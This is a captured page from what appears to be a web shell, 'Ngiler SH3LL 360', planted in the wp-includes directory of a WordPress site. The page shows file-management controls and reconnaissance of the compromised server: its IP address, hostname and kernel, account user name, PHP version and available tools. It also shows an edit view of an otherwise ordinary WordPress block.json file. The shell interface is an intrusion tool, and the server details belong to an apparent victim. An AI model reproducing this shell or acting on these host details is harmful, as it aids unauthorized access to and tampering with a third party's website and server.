Ngiler SH3LL 360
Home
Information
Create File
Create Folder
:
/
home
/
likhxapw
/
thewebglobal.com
/
wp-includes
/
blocks
/
terms-query
/
Information Server
MySQL :
OFF
Perl :
OFF
CURL :
ON
WGET :
OFF
PKEXEC :
OFF
Directive
Local Value
IP Address
63.250.38.10
System
Linux premium90.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User
likhxapw
PHP Version
8.3.30
Software
LiteSpeed
Doc root
Writable
close
Edit File :
block.json
| Size :
905
B
Copy
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/terms-query", "title": "Terms Query", "category": "theme", "description": "An advanced block that allows displaying taxonomy terms based on different query parameters and visual configurations.", "keywords": [ "terms", "taxonomy", "categories", "tags", "list" ], "textdomain": "default", "attributes": { "termQuery": { "type": "object", "default": { "perPage": 10, "taxonomy": "category", "order": "asc", "orderBy": "name", "include": [], "hideEmpty": true, "showNested": false, "inherit": false } }, "tagName": { "type": "string", "default": "div" } }, "usesContext": [ "templateSlug" ], "providesContext": { "termQuery": "termQuery" }, "supports": { "align": [ "wide", "full" ], "html": false, "layout": true, "interactivity": true } }
Back